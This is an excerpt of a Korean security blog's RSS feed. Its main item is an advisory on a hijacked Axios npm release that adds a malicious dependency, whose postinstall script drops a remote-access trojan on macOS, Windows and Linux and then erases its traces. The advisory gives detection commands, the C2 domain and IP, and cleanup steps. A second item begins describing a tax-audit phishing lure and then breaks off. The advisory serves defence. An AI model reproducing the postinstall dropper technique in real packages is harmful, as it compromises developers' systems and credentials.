&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;NPM (Node Package Manager):&lt;/b&gt; 개발자들이 작성한 코드 패키지를 공유하고 관리하는 오픈소스 소프트웨어 저장소(Registry) 입니다. 개발자는 필요한 기능을 직접 구현하는 대신, NPM에 등록된 검증된 패키지를 자신의 프로젝트에 '의존성(Dependency)'으로 추가하여 개발 효율을 높입니다.&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;공격 개요 및 흐름&amp;nbsp;&lt;span style=&quot;letter-spacing: 0px; color: #000000;&quot;&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px; color: #000000;&quot;&gt;공격자는 &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px; color: #000000;&quot;&gt;Axios&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px; color: #000000;&quot;&gt;&amp;nbsp;공식 관리자 계정을 탈취하여 정상적인 패키지 업데이트 과정에 악성 의존성을 주입하고, 이를 통해 최종적으로 강력한 원격 제어 도구(RAT)&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px; color: #000000;&quot;&gt;를&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px; color: #000000;&quot;&gt;&amp;nbsp;유포했습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;b&gt; 1. 계정 탈취 및 악성 패키지 업로드&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;공격자는 탈취한 계정으로 axios@1.14.1 및 0.30.4 버전을 게시했습니다. 이 과정에서 plain-crypto-js@4.2.1 패키지를 필수 의존성(dependency)으로 추가했습니다.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;b&gt;2. 자동 실행 메커니즘&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;사용자가 npm install axios를 실행하면, plain-crypto-js 내의 postinstall 스크립트를 통해 node setup.js 가 자동 실행됩니다.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;b&gt;3. 플랫폼별 맞춤형 드롭퍼 실행&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;setup.js는 시스템 OS를 식별한 후 최적화된 2차 드롭퍼(Dropper)를 내려받습니다.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;macOS:&amp;nbsp;AppleScript&amp;nbsp;기반&amp;nbsp;페이로드&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Windows:&amp;nbsp;VBScript&amp;nbsp;및&amp;nbsp;PowerShell&amp;nbsp;기반&amp;nbsp;페이로드&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Linux:&amp;nbsp;Python&amp;nbsp;기반&amp;nbsp;드롭퍼&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4. RAT 유포&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;드롭퍼를 통해 최종적으로 설치되는 페이로드는 RAT(Remot Access Trojan)이며, 해당 RAT는 시스템에 상주하며 내부시스템 조회, 원격 명령 실행 등 감염 시스템을 제어합니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;5. 정교한 흔적 제거&lt;/b&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;악성 동작 완료 후 setup.js는 자기 자신과 악성 package.json을 삭제합니다. 이후 미리 준비해둔 package.md 파일을 package.json으로 이름을 변경하여 정상 패키지로 보이도록 위장했습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;침해 여부 점검 가이드&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;프로젝트 및 시스템 환경에서 아래 4단계 절차를 통해 악성 코드 노출 여부를 점검하시기 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;b&gt;1단계 - 프로젝트 내 악성 Axios 버전 확인&amp;nbsp;&lt;/b&gt; &lt;br /&gt;터미널에서 아래 명령어를 실행하여 문제가 된 버전이 설치되어 있는지 확인합니다.&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;npm&amp;nbsp;list&amp;nbsp;axios&amp;nbsp;2&amp;gt;/dev/null&amp;nbsp;|&amp;nbsp;grep&amp;nbsp;-E&amp;nbsp;&quot;1\.14\.1|0\.30\.4&quot;&lt;/li&gt;
&lt;li&gt;grep -A1 '&quot;axios&quot;' package-lock.json&amp;nbsp;| grep -E &quot;1\.14\.1|0\.30\.4&quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2단계 - 악성 의존성 패키지 존재 여부 확인&lt;/b&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;node_modules&amp;nbsp;디렉토리&amp;nbsp;안에&amp;nbsp;악성&amp;nbsp;페이로드를&amp;nbsp;담고&amp;nbsp;있는&amp;nbsp;폴더가&amp;nbsp;있는지&amp;nbsp;확인합니다.&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;ls node_modules/plain-crypto-js&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자가&amp;nbsp;흔적을&amp;nbsp;지웠다면&amp;nbsp;해당&amp;nbsp;폴더&amp;nbsp;안의&amp;nbsp;setup.js나&amp;nbsp;package.json이&amp;nbsp;깨끗한&amp;nbsp;파일로&amp;nbsp;대체되었을&amp;nbsp;수&amp;nbsp;있기&amp;nbsp;때문에&amp;nbsp;폴더가&amp;nbsp;존재한다는&amp;nbsp;사실만으로도&amp;nbsp;드롭퍼가&amp;nbsp;실행된&amp;nbsp;것으로&amp;nbsp;볼&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3단계 - 시스템 내 RAT 흔적(Artifacts) 확인&amp;nbsp;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;운영체제별로&amp;nbsp;생성되었을&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;악성&amp;nbsp;파일의&amp;nbsp;존재&amp;nbsp;여부를&amp;nbsp;점검합니다.&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;macOS: ls -la /Library/Caches/com.apple.act.mond&lt;/li&gt;
&lt;li&gt;Linux: ls -la /tmp/ld.py&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Windows (cmd): dir &quot;%PROGRAMDATA%\wt.exe&quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4단계 -&amp;nbsp; CI/CD 파이프라인 점검&amp;nbsp;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;빌드&amp;nbsp;시스템&amp;nbsp;및&amp;nbsp;파이프라인&amp;nbsp;로그를&amp;nbsp;검토하여&amp;nbsp;axios@1.14.1&amp;nbsp;또는&amp;nbsp;axios@0.30.4&amp;nbsp;버전이&amp;nbsp;설치된&amp;nbsp;이력이&amp;nbsp;있는지&amp;nbsp;확인합니다.&amp;nbsp;하나라도&amp;nbsp;설치된&amp;nbsp;기록이&amp;nbsp;있다면&amp;nbsp;해당&amp;nbsp;파이프라인은&amp;nbsp;손상된&amp;nbsp;것으로&amp;nbsp;간주하고,&amp;nbsp;주입된&amp;nbsp;모든&amp;nbsp;비밀&amp;nbsp;키를&amp;nbsp;즉시&amp;nbsp;폐기해야&amp;nbsp;합니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;대응 방안&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;침해가 확인되었거나 취약한 버전을 사용 중인 경우, 단순히 패키지를 삭제하는 것 이상의 강력한 복구 조치가 필요합니다.&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;즉각적인 버전 교체 및 고정&lt;br /&gt;&lt;/b&gt;문제가 된 버전을 즉시 삭제하고, 안전함이 확인된 버전(1.14.0 이하)을 지정하여 재설치합니다.&lt;b&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;임시 데이터 강제 소거&lt;br /&gt;&lt;/b&gt;로컬 및 빌드 서버에 남은 악성 데이터 찌꺼기를 완전히 제거하기 위해 NPM 캐시를 강제로 삭제합니다.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;모든 자격 증명 폐기 및 재발행&lt;br /&gt;&lt;/b&gt;감염된 환경에서 노출되었을 가능성이 있는 모든 API 키, 클라우드 인증 토큰, 비밀번호, SSH 키, NPM 로그인 토큰을 즉시 폐기하고 새로 발급받습니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;네트워크 차단&lt;br /&gt;&lt;/b&gt;C2로 확인된 sfrclak[.]com 도메인 및 IP 주소(142.11.206.73)로 향하는 모든 트래픽을 차단하고, 통신 시도를 모니터링 합니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;보안 강화 설정&lt;br /&gt;&lt;/b&gt;향후 유사 공격을 방지하기 위해 모든 계정에 다중 인증(MFA) 설정을 의무화하고, 패키지 설치 시 악성 스크립트 실행을 막는 --ignore-scripts 옵션 사용을 정책적으로 활용할 것을 권장합니다.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;이번 공격은 단순히 특정 라이브러리의 취약점을 악용한 사례를 넘어, 오픈소스 생태계의 신뢰 구조 자체를 겨냥한 고도화된 공급망 공격의 위협을 보여주는 사례라 할 수 있습니다.&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px;&quot; data-contrast=&quot;auto&quot;&gt;특히 Axios는 수많은 패키지가 의존하는 핵심 라이브러리인 만큼 그 파급력이 매우 크며, 최근 다양한 공격 그룹이 유사한 방식으로 기밀 정보를 탈취해 금전적 이득을 취하는 사례가 급증하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px;&quot; data-contrast=&quot;auto&quot;&gt;유출된 정보는 향후&amp;nbsp;SaaS&amp;nbsp;환경 침해나&amp;nbsp;랜섬웨어, 암호화폐 탈취 등 2차적인 대규모 보안 사고로 이어질 가능성이 높습니다.&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;따라서 보안 담당자분들께서는 현재 시스템의 피해 여부를 즉각 재평가하고, 손상된 환경의 복구와 더불어 향후 유사한 공급망 위협에 대응할 수 있는 다각도의 보안 체계를 구축해&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;주시길&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;당부드립니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;참고:&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package?e=48754805&amp;amp;hl=en&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package?e=48754805&amp;amp;hl=en&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://socket.dev/blog/axios-npm-package-compromised&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://socket.dev/blog/axios-npm-package-compromised&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;a href=&quot;http://www.estsecurity.com&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cAm9k0/dJMcadnVNxA/KeMnxXkzmJkqKYmQppQOh1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcAm9k0%2FdJMcadnVNxA%2FKeMnxXkzmJkqKYmQppQOh1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>국내외 보안동향</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5742</guid>
      <comments>https://alyacofficialblog.tistory.com/5742#entry5742comment</comments>
      <pubDate>Wed, 1 Apr 2026 13:22:28 +0900</pubDate>
    </item>
    <item>
      <title>국세청 세무조사 사칭 피싱 메일을 통해 유포 중인 백도어 악성코드</title>
      <link>https://alyacofficialblog.tistory.com/5741</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;6144&quot; data-origin-height=&quot;4096&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dSA82c/dJMcaivUCEQ/urSPpeWcbGh1E5wBaGz1mk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dSA82c/dJMcaivUCEQ/urSPpeWcbGh1E5wBaGz1mk/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dSA82c/dJMcaivUCEQ/urSPpeWcbGh1E5wBaGz1mk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdSA82c%2FdJMcaivUCEQ%2FurSPpeWcbGh1E5wBaGz1mk%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;6144&quot; height=&quot;4096&quot; data-origin-width=&quot;6144&quot; data-origin-height=&quot;4096&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;최근 국세청&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;세무조사&lt;/span&gt;&lt;span&gt;를 사칭한 피싱 메일을 통해&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;악성코드&lt;/span&gt;&lt;span&gt;가 유포 중인 것으로 확인되었습니다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;공격자는&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;피싱 메일&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;내 악성 링크를 통해&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;국세청 세무조사 통지 화면으로&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;위장한&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;피싱&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;사이트&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;로&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;&amp;nbsp;접속&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;하게 한 뒤&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;&amp;nbsp;해당 페이지&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;에서 악성파일을 다운&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;로드하도록 유도&lt;/span&gt;&lt;span style=&quot;color: #000000; background-color: #ffffff; letter-spacing: 0px;&quot;&gt;합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;개요 및 유입 경로&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;최근&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;기업 담당자를 대상으로&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&amp;lsquo;국세청 세무&lt;/span&gt;&lt;span&gt;조사&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;통&lt;/span&gt;&lt;span&gt;지&amp;rsquo;&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;를&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;사칭한 피싱 메일이 유포되었습니다.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;사용자가 메일 내 링크를 클릭하면 국세청을 사칭한 피싱&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;사이&lt;/span&gt;&lt;span&gt;로 연결되며, 세무조사 안내 문구와 함께&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;[조사 명단 다운로드]&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;버튼을 노출하여 클릭을 유도하는 방식입니다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;757&quot; data-origin-height=&quot;607&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/VMGD4/dJMcahDLRRN/wILUZH68pHhbrh53jBrnt1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/VMGD4/dJMcahDLRRN/wILUZH68pHhbrh53jBrnt1/img.png&quot; data-alt=&quot;[그림 1] 피싱 &amp;amp;nbsp;사이트&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/VMGD4/dJMcahDLRRN/wILUZH68pHhbrh53jBrnt1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FVMGD4%2FdJMcahDLRRN%2FwILUZH68pHhbrh53jBrnt1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;757&quot; height=&quot;607&quot; data-origin-width=&quot;757&quot; data-origin-height=&quot;607&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 1] 피싱 &amp;nbsp;사이트&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;버튼&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;클릭&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;시&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&amp;lsquo;&lt;/span&gt;&lt;span&gt;기업 조사&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;명단&lt;/span&gt;&lt;span&gt;&amp;rsquo;&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;span&gt;zip&lt;/span&gt;&lt;span&gt;&amp;rsquo;&lt;/span&gt;&lt;span&gt; 파일이 다운로드&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;되며,&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;압축 파일 내에는 &lt;/span&gt;&lt;span&gt;다음과 같은 3개의 파일이 존재&lt;/span&gt;&lt;span&gt;합니다.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
